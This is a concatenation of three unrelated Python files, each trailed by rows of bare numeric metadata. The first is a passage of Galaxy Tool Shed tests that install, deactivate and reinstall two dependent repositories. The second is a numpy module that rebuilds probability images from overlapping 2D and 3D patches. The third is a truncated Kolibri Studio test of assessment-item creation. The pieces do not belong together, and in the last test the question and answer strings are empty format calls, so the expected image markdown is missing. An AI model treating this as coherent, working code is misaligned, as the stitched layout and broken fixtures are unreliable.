'repository_dependencies.xml',
filepath=repository_dependencies_path,
commit_message='Uploaded dependency on convert' )
convert_repository = test_db_util.get_repository_by_name_and_owner( convert_repository_name, common.test_user_1_name )
column_repository = test_db_util.get_repository_by_name_and_owner( column_repository_name, common.test_user_1_name )
repository_dependencies_path = self.generate_temp_path( 'test_1080', additional_paths=[ 'convert' ] )
self.generate_repository_dependency_xml( [ column_repository ],
self.get_filename( 'repository_dependencies.xml', filepath=repository_dependencies_path ),
dependency_description='Convert chars depends on the column_maker repository.' )
self.upload_file( convert_repository,
'repository_dependencies.xml',
filepath=repository_dependencies_path,
commit_message='Uploaded dependency on column' )
def test_0020_install_convert_repository( self ):
'''Install convert_chars without repository dependencies into convert_chars tool panel section.'''
self.galaxy_logout()
self.galaxy_login( email=common.admin_email, username=common.admin_username )
self.install_repository( convert_repository_name,
common.test_user_1_name,
category_name,
install_tool_dependencies=False,
install_repository_dependencies=False,
new_tool_panel_section='convert_chars' )
installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
common.test_user_1_name )
installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
common.test_user_1_name )
browse_strings_displayed = [ installed_convert_repository.name,
installed_convert_repository.description,
installed_convert_repository.tool_shed,
installed_convert_repository.installed_changeset_revision ]
strings_displayed = [ installed_convert_repository.name,
installed_convert_repository.description,
installed_convert_repository.tool_shed,
installed_convert_repository.installed_changeset_revision,
installed_column_repository.name,
installed_column_repository.installed_changeset_revision,
'Missing repository dependencies' ]
self.display_galaxy_browse_repositories_page( strings_displayed=browse_strings_displayed )
self.display_installed_repository_manage_page( installed_convert_repository,
strings_displayed=strings_displayed )
def test_0025_install_column_repository( self ):
'''Install column maker with repository dependencies into column_maker tool panel section.'''
self.install_repository( column_repository_name,
common.test_user_1_name,
category_name,
install_repository_dependencies=True,
new_tool_panel_section='column_maker',
strings_displayed=[ 'install_repository_dependencies' ] )
installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
common.test_user_1_name )
installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
common.test_user_1_name )
browse_strings_displayed = [ installed_convert_repository.name,
installed_convert_repository.description,
installed_convert_repository.tool_shed,
installed_convert_repository.installed_changeset_revision,
installed_column_repository.name,
installed_column_repository.description,
installed_column_repository.installed_changeset_revision ]
strings_displayed = [ installed_column_repository.name,
installed_column_repository.description,
installed_column_repository.tool_shed,
installed_column_repository.installed_changeset_revision,
installed_convert_repository.name,
installed_convert_repository.installed_changeset_revision,
'Installed repository dependencies' ]
self.display_galaxy_browse_repositories_page( strings_displayed=browse_strings_displayed )
self.display_installed_repository_manage_page( installed_column_repository,
strings_displayed=strings_displayed )
def test_0030_deactivate_convert_repository( self ):
'''Deactivate convert_chars, verify that column_maker is installed and missing repository dependencies.'''
installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
common.test_user_1_name )
installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
common.test_user_1_name )
self.uninstall_repository( installed_convert_repository, remove_from_disk=False )
strings_displayed = [ installed_column_repository.name,
installed_column_repository.description,
installed_column_repository.tool_shed,
installed_column_repository.installed_changeset_revision,
installed_convert_repository.name,
installed_convert_repository.installed_changeset_revision,
'Missing repository dependencies',
'Deactivated' ]
self.display_installed_repository_manage_page( installed_column_repository,
strings_displayed=strings_displayed )
def test_0035_reactivate_convert_repository( self ):
'''Reactivate convert_chars, both convert_chars and column_maker should now show as installed.'''
installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
common.test_user_1_name )
installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
common.test_user_1_name )
self.reactivate_repository( installed_convert_repository )
strings_displayed = [ installed_convert_repository.name,
installed_convert_repository.description,
installed_convert_repository.tool_shed,
installed_convert_repository.installed_changeset_revision,
installed_column_repository.name,
installed_column_repository.installed_changeset_revision,
'Installed repository dependencies' ]
def test_0040_deactivate_column_repository( self ):
'''Deactivate column_maker, verify that convert_chars is installed and missing repository dependencies.'''
installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
common.test_user_1_name )
installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
common.test_user_1_name )
self.uninstall_repository( installed_column_repository, remove_from_disk=False )
strings_displayed = [ installed_convert_repository.name,
installed_convert_repository.description,
installed_convert_repository.tool_shed,
installed_convert_repository.installed_changeset_revision,
installed_column_repository.name,
installed_column_repository.installed_changeset_revision,
'Missing repository dependencies',
'Deactivated' ]
self.display_installed_repository_manage_page( installed_convert_repository,
strings_displayed=strings_displayed )
def test_0045_deactivate_convert_repository( self ):
'''Deactivate convert_chars, verify that both convert_chars and column_maker are deactivated.'''
installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
common.test_user_1_name )
installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
common.test_user_1_name )
self.uninstall_repository( installed_convert_repository, remove_from_disk=False )
strings_not_displayed = [ installed_column_repository.name,
installed_column_repository.installed_changeset_revision,
installed_convert_repository.name,
installed_convert_repository.installed_changeset_revision ]
self.display_galaxy_browse_repositories_page( strings_not_displayed=strings_not_displayed )
def test_0050_reactivate_column_repository( self ):
'''Reactivate column_maker. This should not automatically reactivate convert_chars, so column_maker should be displayed as installed but missing repository dependencies.'''
installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
common.test_user_1_name )
installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
common.test_user_1_name )
self.reactivate_repository( installed_column_repository )
strings_displayed = [ installed_column_repository.name,
installed_column_repository.description,
installed_column_repository.tool_shed,
installed_column_repository.installed_changeset_revision,
installed_convert_repository.name,
installed_convert_repository.installed_changeset_revision,
'Missing repository dependencies',
'Deactivated' ]
self.display_installed_repository_manage_page( installed_column_repository,
strings_displayed=strings_displayed )
def test_0055_reactivate_convert_repository( self ):
'''Activate convert_chars. Both convert_chars and column_maker should now show as installed.'''
installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
common.test_user_1_name )
installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
common.test_user_1_name )
self.reactivate_repository( installed_convert_repository )
strings_displayed = [ installed_column_repository.name,
installed_column_repository.description,
installed_column_repository.tool_shed,
installed_column_repository.installed_changeset_revision,
installed_convert_repository.name,
installed_convert_repository.installed_changeset_revision,
'Installed repository dependencies' ]
self.display_installed_repository_manage_page( installed_column_repository,
strings_displayed=strings_displayed )
strings_displayed = [ installed_convert_repository.name,
installed_convert_repository.description,
installed_convert_repository.tool_shed,
installed_convert_repository.installed_changeset_revision,
installed_column_repository.name,
installed_column_repository.installed_changeset_revision,
'Installed repository dependencies' ]
self.display_installed_repository_manage_page( installed_convert_repository,
strings_displayed=strings_displayed )
def test_0060_uninstall_column_repository( self ):
'''Uninstall column_maker. Verify that convert_chars is installed and missing repository dependencies, and column_maker was in the right tool panel section.'''
installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
common.test_user_1_name )
installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
common.test_user_1_name )
self.uninstall_repository( installed_column_repository, remove_from_disk=True )
strings_displayed = [ installed_convert_repository.name,
installed_convert_repository.description,
installed_convert_repository.tool_shed,
installed_convert_repository.installed_changeset_revision,
installed_column_repository.name,
installed_column_repository.installed_changeset_revision,
'Missing repository dependencies',
'Uninstalled' ]
self.display_installed_repository_manage_page( installed_convert_repository,
strings_displayed=strings_displayed )
self.check_galaxy_repository_tool_panel_section( installed_column_repository, 'column_maker' )
def test_0065_reinstall_column_repository( self ):
'''Reinstall column_maker without repository dependencies, verify both convert_chars and column_maker are installed.'''
installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
common.test_user_1_name )
installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
common.test_user_1_name )
self.reinstall_repository( installed_column_repository, install_repository_dependencies=False )
strings_displayed = [ installed_column_repository.name,
installed_column_repository.description,
installed_column_repository.tool_shed,
installed_column_repository.installed_changeset_revision,
installed_convert_repository.name,
installed_convert_repository.installed_changeset_revision,
'Installed repository dependencies' ]
self.display_installed_repository_manage_page( installed_column_repository,
strings_displayed=strings_displayed )
strings_displayed = [ installed_convert_repository.name,
installed_convert_repository.description,
installed_convert_repository.tool_shed,
installed_convert_repository.installed_changeset_revision,
installed_column_repository.name,
installed_column_repository.installed_changeset_revision,
'Installed repository dependencies' ]
self.display_installed_repository_manage_page( installed_convert_repository,
strings_displayed=strings_displayed )
def test_0070_uninstall_convert_repository( self ):
'''Uninstall convert_chars, verify column_maker installed but missing repository dependencies.'''
installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
common.test_user_1_name )
installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
common.test_user_1_name )
self.uninstall_repository( installed_convert_repository, remove_from_disk=True )
strings_displayed = [ installed_column_repository.name,
installed_column_repository.description,
installed_column_repository.tool_shed,
installed_column_repository.installed_changeset_revision,
installed_convert_repository.name,
installed_convert_repository.installed_changeset_revision,
'Missing repository dependencies',
'Uninstalled' ]
self.display_installed_repository_manage_page( installed_column_repository,
strings_displayed=strings_displayed )
self.check_galaxy_repository_tool_panel_section( installed_convert_repository, 'convert_chars' )
def test_0075_uninstall_column_repository( self ):
'''Uninstall column_maker, verify that both convert_chars and column_maker are uninstalled.'''
installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
common.test_user_1_name )
installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
common.test_user_1_name )
self.uninstall_repository( installed_column_repository, remove_from_disk=True )
strings_displayed = [ installed_convert_repository.name,
installed_convert_repository.description,
installed_convert_repository.tool_shed,
installed_convert_repository.installed_changeset_revision,
installed_column_repository.name,
installed_column_repository.installed_changeset_revision,
'Missing repository dependencies',
'Activate or reinstall repository',
'Uninstalled' ]
self.display_installed_repository_manage_page( installed_convert_repository,
strings_displayed=strings_displayed )
def test_0080_reinstall_convert_repository( self ):
'''Reinstall convert_chars with repository dependencies, verify that this installs both convert_chars and column_maker.'''
installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
common.test_user_1_name )
installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
common.test_user_1_name )
self.reinstall_repository( installed_convert_repository,
install_repository_dependencies=True,
no_changes=False,
new_tool_panel_section='convert_maker' )
strings_displayed = [ installed_column_repository.name,
installed_column_repository.description,
installed_column_repository.tool_shed,
installed_column_repository.installed_changeset_revision,
installed_convert_repository.name,
installed_convert_repository.installed_changeset_revision,
'Installed repository dependencies' ]
self.display_installed_repository_manage_page( installed_column_repository,
strings_displayed=strings_displayed )
strings_displayed = [ installed_convert_repository.name,
installed_convert_repository.description,
installed_convert_repository.tool_shed,
installed_convert_repository.installed_changeset_revision,
installed_column_repository.name,
installed_column_repository.installed_changeset_revision,
'Installed repository dependencies' ]
self.display_installed_repository_manage_page( installed_convert_repository,
strings_displayed=strings_displayed )
def test_0085_uninstall_all_repositories( self ):
'''Uninstall convert_chars and column_maker to verify that they are in the right tool panel sections.'''
installed_convert_repository = test_db_util.get_installed_repository_by_name_owner( convert_repository_name,
common.test_user_1_name )
installed_column_repository = test_db_util.get_installed_repository_by_name_owner( column_repository_name,
common.test_user_1_name )
self.uninstall_repository( installed_column_repository, remove_from_disk=True )
self.uninstall_repository( installed_convert_repository, remove_from_disk=True )
test_db_util.ga_refresh( installed_column_repository )
test_db_util.ga_refresh( installed_convert_repository )
self.check_galaxy_repository_tool_panel_section( installed_column_repository, 'convert_maker' )
self.check_galaxy_repository_tool_panel_section( installed_convert_repository, 'convert_maker' )
| 81.16095
| 180
| 0.606404
| 2,683
| 30,760
| 6.439806
| 0.067835
| 0.121021
| 0.130918
| 0.037331
| 0.831346
| 0.82388
| 0.800787
| 0.79471
| 0.786665
| 0.767276
| 0
| 0.007027
| 0.352308
| 30,760
| 378
| 181
| 81.375661
| 0.860212
| 0.060663
| 0
| 0.764205
| 0
| 0
| 0.05108
| 0.00691
| 0
| 0
| 0
| 0
| 0.008523
| 1
| 0.051136
| false
| 0
| 0.005682
| 0
| 0.059659
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
76f6986d3995a5e29eb7e93fe514c9235c05ad72
| 14,933
|
py
|
Python
|
GUI/PyQt/utils/Unpatching.py
|
thomaskuestner/CNNArt
|
c2fc639dd2ce035f6ca90113290682a0ccd26fb8
|
[
"Apache-2.0"
] | 22
|
2018-04-27T21:28:46.000Z
|
2021-12-24T06:44:55.000Z
|
GUI/PyQt/utils/Unpatching.py
|
thomaskuestner/CNNArt
|
c2fc639dd2ce035f6ca90113290682a0ccd26fb8
|
[
"Apache-2.0"
] | 81
|
2017-11-09T17:23:15.000Z
|
2020-01-28T22:54:13.000Z
|
GUI/PyQt/utils/Unpatching.py
|
thomaskuestner/CNNArt
|
c2fc639dd2ce035f6ca90113290682a0ccd26fb8
|
[
"Apache-2.0"
] | 18
|
2017-11-13T16:12:17.000Z
|
2020-08-27T10:17:34.000Z
|
import numpy as np
import math
#########################################################################################################################################
#Module: Unpatching #
#The module Unpatching is responsible for reconstructing the probability-images. To reconstruct the images the means of all #
#probabilities from overlapping patches are calculated and are assigned to every pixel-image. It's important to consider the order of #
#dimensions within the algorithm of the module RigidPatching. In this case the order is: weight(x), height(y), depth(z) #
#The Unpatching-module contains two function: #
#fUnpatch2D: For 2D Patch-Splitting #
#fUnpatch3D: For 3D Patch-Splitting #
#########################################################################################################################################
#########################################################################################################################################
#Function: fUnpatch2D #
#The function fUnpatch2D has the task to reconstruct the probability-images. Every patch contains the probability of every class. #
#To visualize the probabilities it is important to reconstruct the probability-images. This function is used for 2D patching. # #
#Input: prob_list ---> list of probabilities of every Patch. The column describes the classes, the row describes the probability of #
# every class #
# patchSize ---> size of patches, example: [40, 40, 10], patchSize[0] = height, patchSize[1] = weight, patchSize[2] = depth #
# patchOverlap ---> the ratio for overlapping, example: 0.25 # #
# actualSize ---> the actual size of the chosen mrt-layer: example: ab, t1_tse_tra_Kopf_0002; actual size = [256, 196, 40] #
# iClass ---> the number of the class, example: ref = 0, artefact = 1 #
#Output: unpatchImg ---> 3D-Numpy-Array, which contains the probability of every image pixel. #
#########################################################################################################################################
def fUnpatch2D(prob_list, patchSize, patchOverlap, actualSize, iClass):
iCorner = [0, 0, 0]
dOverlap = np.round(np.multiply(patchSize, patchOverlap))
dNotOverlap = [patchSize[0] - dOverlap[0], patchSize[1] - dOverlap[1]]
paddedSize = [int(math.ceil((actualSize[0] - dOverlap[0]) / (dNotOverlap[0])) * dNotOverlap[0] + dOverlap[0]),
int(math.ceil((actualSize[1] - dOverlap[1]) / (dNotOverlap[1])) * dNotOverlap[1] + dOverlap[1]),
actualSize[2]]
unpatchImg = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))
numVal = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))
for iIndex in range(0, prob_list.shape[0], 1):
#print(iIndex)
#print(iCorner)
lMask = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))
lMask[iCorner[0]:iCorner[0] + int(patchSize[0]), iCorner[1]:iCorner[1] + int(patchSize[1]), iCorner[2]] = 1
unpatchImg[iCorner[0]:iCorner[0] + int(patchSize[0]), iCorner[1]:iCorner[1] + int(patchSize[1]), iCorner[2]] \
= np.add(unpatchImg[iCorner[0]:iCorner[0] + int(patchSize[0]),
iCorner[1]:iCorner[1] + int(patchSize[1]),
iCorner[2]],
prob_list[iIndex, iClass])
lMask = lMask == 1
numVal[lMask] = numVal[lMask] + 1
iCorner[1] =int(iCorner[1]+dNotOverlap[1])
if iCorner[1] + patchSize[1] - 1 > paddedSize[1]:
iCorner[1] = 0
iCorner[0] = int(iCorner[0] + dNotOverlap[0])
if iCorner[0] + patchSize[0] - 1 > paddedSize[0]:
iCorner[0] = 0
iCorner[1] = 0
iCorner[2] = int(iCorner[2] + 1)
print(str(iCorner[2] / actualSize[2] * 100) + "%")
unpatchImg = np.divide(unpatchImg, numVal)
if paddedSize == actualSize:
pass
else:
pad_y = int((paddedSize[0]-actualSize[0])/2)
pad_x = int((paddedSize[1]-actualSize[1])/2)
pad_y_max = int(paddedSize[0]-(paddedSize[0]-actualSize[0]-pad_y))
pad_x_max = int(paddedSize[1]-(paddedSize[1]-actualSize[1]-pad_x))
unpatchImg = unpatchImg[pad_y:pad_y_max, pad_x:pad_x_max, :]
return unpatchImg
#########################################################################################################################################
#Function: fUnpatch3D #
#The function fUnpatch3D has the task to reconstruct the probability-images. Every patch contains the probability of every class. #
#To visualize the probabilities it is inportant to reconstruct the probability-images. This function is used for 3D patching. # #
#Input: prob_list ---> list of probabilities of every Patch. The column describes the classes, the row describes the probability of #
# every class #
# patchSize ---> size of patches, example: [40, 40, 10], patchSize[0] = height, patchSize[1] = weight, patchSize[2] = depth #
# patchOverlap ---> the ratio for overlapping, example: 0.25 # #
# actualSize ---> the actual size of the chosen mrt-layer: example: ab, t1_tse_tra_Kopf_0002; actual size = [256, 196, 40] #
# iClass ---> the number of the class, example: ref = 0, artefact = 1 #
#Output: unpatchImg ---> 3D-Numpy-Array, which contains the probability of every image pixel. #
#########################################################################################################################################
def fUnpatch3D(prob_list, patchSize, patchOverlap, actualSize):
iCorner = [0, 0, 0]
dOverlap = np.round(np.multiply(patchSize, patchOverlap))
dNotOverlap = [patchSize[0] - dOverlap[0], patchSize[1] - dOverlap[1], patchSize[2] - dOverlap[2]]
paddedSize = [int(math.ceil((actualSize[0] - dOverlap[0]) / (dNotOverlap[0])) * dNotOverlap[0] + dOverlap[
0]), int(math.ceil((actualSize[1] - dOverlap[1]) / (dNotOverlap[1])) * dNotOverlap[1] + dOverlap[1]),
int(math.ceil((actualSize[2] - dOverlap[2]) / (dNotOverlap[2])) * dNotOverlap[2] + dOverlap[2])]
unpatchImg = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))
numVal = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))
for iIndex in range(0, prob_list.shape[0], 1):
print(iIndex)
lMask = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))
lMask[iCorner[0]: iCorner[0] + patchSize[0], iCorner[1]: iCorner[1] + patchSize[1], iCorner[2]: iCorner[2] + patchSize[2]] = 1
unpatchImg[iCorner[0]:iCorner[0] + patchSize[0], iCorner[1]: iCorner[1] + patchSize[1], iCorner[2]: iCorner[2] + patchSize[2]] \
= np.add(unpatchImg[iCorner[0]: iCorner[0] + patchSize[0], iCorner[1]: iCorner[1] + patchSize[1],
iCorner[2]: iCorner[2] + patchSize[2]], prob_list[iIndex, 1])
lMask = lMask == 1
numVal[lMask] = numVal[lMask] + 1
iCorner[1] = int(iCorner[1] + dNotOverlap[1])
if iCorner[1] + patchSize[1] - 1 > paddedSize[1]:
iCorner[1] = 0
iCorner[0] = int(iCorner[0] + dNotOverlap[0])
if iCorner[0] + patchSize[0] - 1 > paddedSize[0]:
iCorner[0] = 0
iCorner[1] = 0
iCorner[2] = int(iCorner[2] + dNotOverlap[2])
print(str(iCorner[2] / actualSize[2] * 100) + "%")
unpatchImg = np.divide(unpatchImg, numVal)
if paddedSize == actualSize:
pass
else:
pad_y = int((paddedSize[0] - actualSize[0]) / 2)
pad_x = int((paddedSize[1] - actualSize[1]) / 2)
pad_z = int((paddedSize[2] - actualSize[2]) / 2)
pad_y_max = int(paddedSize[0] - (paddedSize[0] - actualSize[0] - pad_y))
pad_x_max = int(paddedSize[1] - (paddedSize[1] - actualSize[1] - pad_x))
pad_z_max = int(paddedSize[2] - (paddedSize[2] - actualSize[2] - pad_z))
unpatchImg = unpatchImg[pad_y:pad_y_max, pad_x:pad_x_max, pad_z:pad_z_max]
return unpatchImg
def fUnpatchSegmentation(prob_list, patchSize, patchOverlap, actualSize, iClass):
'''
:param prob_list:
:param patchSize:
:param patchOverlap:
:param actualSize:
:param iClass: 0 -> background, 1-> foreground
:return:
'''
iCorner = [0, 0, 0]
dOverlap = np.round(np.multiply(patchSize, patchOverlap))
dNotOverlap = [patchSize[0] - dOverlap[0], patchSize[1] - dOverlap[1], patchSize[2] - dOverlap[2]]
paddedSize = \
[int(math.ceil((actualSize[0]-dOverlap[0])/(dNotOverlap[0]))*dNotOverlap[0]+dOverlap[0]),
int(math.ceil((actualSize[1] - dOverlap[1]) / (dNotOverlap[1])) * dNotOverlap[1] + dOverlap[1]),
int(math.ceil((actualSize[2] - dOverlap[2]) / (dNotOverlap[2])) * dNotOverlap[2] + dOverlap[2])]
unpatchImg = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))
numVal = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))
for iIndex in range(0, prob_list.shape[0], 1):
#print(iIndex)
#print(iCorner)
lMask = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))
lMask[iCorner[0]:(iCorner[0]+patchSize[0]), iCorner[1]:(iCorner[1]+patchSize[1]), iCorner[2]:(iCorner[2]+patchSize[2])] = 1
vox = unpatchImg[iCorner[0]:(iCorner[0]+patchSize[0]),
iCorner[1]:(iCorner[1] + patchSize[1]),
iCorner[2]:(iCorner[2] + patchSize[2])]
if iClass == 1000:
unpatchImg[iCorner[0]:(iCorner[0]+patchSize[0]), iCorner[1]:(iCorner[1]+patchSize[1]), iCorner[2]:(iCorner[2]+patchSize[2])] = \
np.add(vox, prob_list[iIndex, :, :, :])
else:
unpatchImg[iCorner[0]:(iCorner[0] + patchSize[0]), iCorner[1]:(iCorner[1] + patchSize[1]), iCorner[2]:(iCorner[2] + patchSize[2])] = \
np.add(vox, prob_list[iIndex, :, :, :, iClass])
lMask = lMask == 1
numVal[lMask] = numVal[lMask] + 1
iCorner[1] = int(iCorner[1] + dNotOverlap[1])
if iCorner[1] + patchSize[1] - 1 > paddedSize[1]:
iCorner[1] = 0
iCorner[0] = int(iCorner[0] + dNotOverlap[0])
if iCorner[0] + patchSize[0] - 1 > paddedSize[0]:
iCorner[0] = 0
iCorner[1] = 0
iCorner[2] = int(iCorner[2] + dNotOverlap[2])
print(str(iCorner[2]/actualSize[2]*100)+"%")
unpatchImg = np.divide(unpatchImg, numVal)
if paddedSize == actualSize:
pass
else:
pad_y = int((paddedSize[0] - actualSize[0]) / 2)
pad_x = int((paddedSize[1] - actualSize[1]) / 2)
pad_z = int((paddedSize[2] - actualSize[2]) / 2)
pad_y_max = int(paddedSize[0] - (paddedSize[0] - actualSize[0] - pad_y))
pad_x_max = int(paddedSize[1] - (paddedSize[1] - actualSize[1] - pad_x))
pad_z_max = int(paddedSize[2] - (paddedSize[2] - actualSize[2] - pad_z))
unpatchImg = unpatchImg[pad_y:pad_y_max, pad_x:pad_x_max, pad_z:pad_z_max]
return unpatchImg
def fMulticlassUnpatch2D(prob_list, patchSize, patchOverlap, actualSize):
iCorner = [0, 0, 0]
dOverlap = np.round(np.multiply(patchSize, patchOverlap))
dNotOverlap = [patchSize[0] - dOverlap[0], patchSize[1] - dOverlap[1]]
paddedSize = [int(math.ceil((actualSize[0] - dOverlap[0]) / (dNotOverlap[0])) * dNotOverlap[0] + dOverlap[0]),
int(math.ceil((actualSize[1] - dOverlap[1]) / (dNotOverlap[1])) * dNotOverlap[1] + dOverlap[1]),
actualSize[2]]
unpatchedPredictions = np.zeros((paddedSize[0], paddedSize[1], prob_list.shape[1], paddedSize[2]))
numVal = np.zeros((paddedSize[0], paddedSize[1], prob_list.shape[1], paddedSize[2]))
for iIndex in range(0, prob_list.shape[0], 1):
#print(iIndex)
#print(iCorner)
lMask = np.zeros((paddedSize[0], paddedSize[1], prob_list.shape[1], paddedSize[2]))
lMask[iCorner[0]:iCorner[0] + int(patchSize[0]), iCorner[1]:iCorner[1] + int(patchSize[1]), :, iCorner[2]] = 1
unpatchedPredictions[iCorner[0]:iCorner[0] + int(patchSize[0]), iCorner[1]:iCorner[1] + int(patchSize[1]), :, iCorner[2]] \
= np.add(unpatchedPredictions[iCorner[0]:iCorner[0] + int(patchSize[0]), iCorner[1]:iCorner[1] + int(patchSize[1]), :, iCorner[2]], prob_list[iIndex, :])
lMask = lMask == 1
numVal[lMask] = numVal[lMask] + 1
iCorner[1] =int(iCorner[1]+dNotOverlap[1])
if iCorner[1] + patchSize[1] - 1 > paddedSize[1]:
iCorner[1] = 0
iCorner[0] = int(iCorner[0] + dNotOverlap[0])
if iCorner[0] + patchSize[0] - 1 > paddedSize[0]:
iCorner[0] = 0
iCorner[1] = 0
iCorner[2] = int(iCorner[2] + 1)
print(str(iCorner[2] / actualSize[2] * 100) + "%")
unpatchImg = np.divide(unpatchedPredictions, numVal)
if paddedSize == actualSize:
pass
else:
pad_y = int((paddedSize[0]-actualSize[0])/2)
pad_x = int((paddedSize[1]-actualSize[1])/2)
pad_y_max = int(paddedSize[0]-(paddedSize[0]-actualSize[0]-pad_y))
pad_x_max = int(paddedSize[1]-(paddedSize[1]-actualSize[1]-pad_x))
unpatchImg = unpatchImg[pad_y:pad_y_max, pad_x:pad_x_max, :]
return unpatchImg
| 53.715827
| 270
| 0.513895
| 1,615
| 14,933
| 4.691641
| 0.08483
| 0.048568
| 0.024944
| 0.027452
| 0.897585
| 0.897585
| 0.885707
| 0.885707
| 0.885707
| 0.885707
| 0
| 0.047746
| 0.298734
| 14,933
| 278
| 271
| 53.715827
| 0.675802
| 0.286011
| 0
| 0.779874
| 0
| 0
| 0.000411
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025157
| false
| 0.025157
| 0.012579
| 0
| 0.062893
| 0.031447
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a2d000276ce31c297bdbb2f40d4f8f71507c0a4
| 27,359
|
py
|
Python
|
contentcuration/contentcuration/tests/viewsets/test_assessmentitem.py
|
d0sadata/studio
|
ec3b805c0b546fe8884d446152eead90bea4174d
|
[
"MIT"
] | 60
|
2018-03-29T23:33:29.000Z
|
2022-03-19T12:10:56.000Z
|
contentcuration/contentcuration/tests/viewsets/test_assessmentitem.py
|
d0sadata/studio
|
ec3b805c0b546fe8884d446152eead90bea4174d
|
[
"MIT"
] | 2,260
|
2018-03-02T23:14:49.000Z
|
2022-03-29T20:57:21.000Z
|
contentcuration/contentcuration/tests/viewsets/test_assessmentitem.py
|
d0sadata/studio
|
ec3b805c0b546fe8884d446152eead90bea4174d
|
[
"MIT"
] | 86
|
2018-03-19T21:26:35.000Z
|
2022-03-28T10:09:17.000Z
|
from __future__ import absolute_import
import uuid
from django.urls import reverse
from le_utils.constants import content_kinds
from le_utils.constants import exercises
from contentcuration import models
from contentcuration.tests import testdata
from contentcuration.tests.base import StudioAPITestCase
from contentcuration.viewsets.sync.constants import ASSESSMENTITEM
from contentcuration.viewsets.sync.utils import generate_create_event
from contentcuration.viewsets.sync.utils import generate_delete_event
from contentcuration.viewsets.sync.utils import generate_update_event
class SyncTestCase(StudioAPITestCase):
@property
def sync_url(self):
return reverse("sync")
@property
def assessmentitem_metadata(self):
return {
"assessment_id": uuid.uuid4().hex,
"contentnode": self.channel.main_tree.get_descendants()
.filter(kind_id=content_kinds.EXERCISE)
.first()
.id,
}
@property
def assessmentitem_db_metadata(self):
return {
"assessment_id": uuid.uuid4().hex,
"contentnode_id": self.channel.main_tree.get_descendants()
.filter(kind_id=content_kinds.EXERCISE)
.first()
.id,
}
def setUp(self):
super(SyncTestCase, self).setUp()
self.channel = testdata.channel()
self.user = testdata.user()
self.channel.editors.add(self.user)
def test_create_assessmentitem(self):
self.client.force_authenticate(user=self.user)
assessmentitem = self.assessmentitem_metadata
response = self.client.post(
self.sync_url,
[
generate_create_event(
[assessmentitem["contentnode"], assessmentitem["assessment_id"]],
ASSESSMENTITEM,
assessmentitem,
)
],
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
try:
models.AssessmentItem.objects.get(
assessment_id=assessmentitem["assessment_id"]
)
except models.AssessmentItem.DoesNotExist:
self.fail("AssessmentItem was not created")
def test_create_assessmentitem_with_file_question(self):
self.client.force_authenticate(user=self.user)
assessmentitem = self.assessmentitem_metadata
image_file = testdata.fileobj_exercise_image()
image_file.uploaded_by = self.user
image_file.save()
question = "".format(
exercises.IMG_PLACEHOLDER, image_file.checksum, image_file.file_format_id
)
assessmentitem["question"] = question
response = self.client.post(
self.sync_url,
[
generate_create_event(
[assessmentitem["contentnode"], assessmentitem["assessment_id"]],
ASSESSMENTITEM,
assessmentitem,
)
],
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
try:
ai = models.AssessmentItem.objects.get(
assessment_id=assessmentitem["assessment_id"]
)
except models.AssessmentItem.DoesNotExist:
self.fail("AssessmentItem was not created")
try:
file = ai.files.get()
self.assertEqual(file.id, image_file.id)
except models.File.DoesNotExist:
self.fail("File was not updated")
def test_create_assessmentitem_with_file_answers(self):
self.client.force_authenticate(user=self.user)
assessmentitem = self.assessmentitem_metadata
image_file = testdata.fileobj_exercise_image()
image_file.uploaded_by = self.user
image_file.save()
answers = "".format(
exercises.IMG_PLACEHOLDER, image_file.checksum, image_file.file_format_id
)
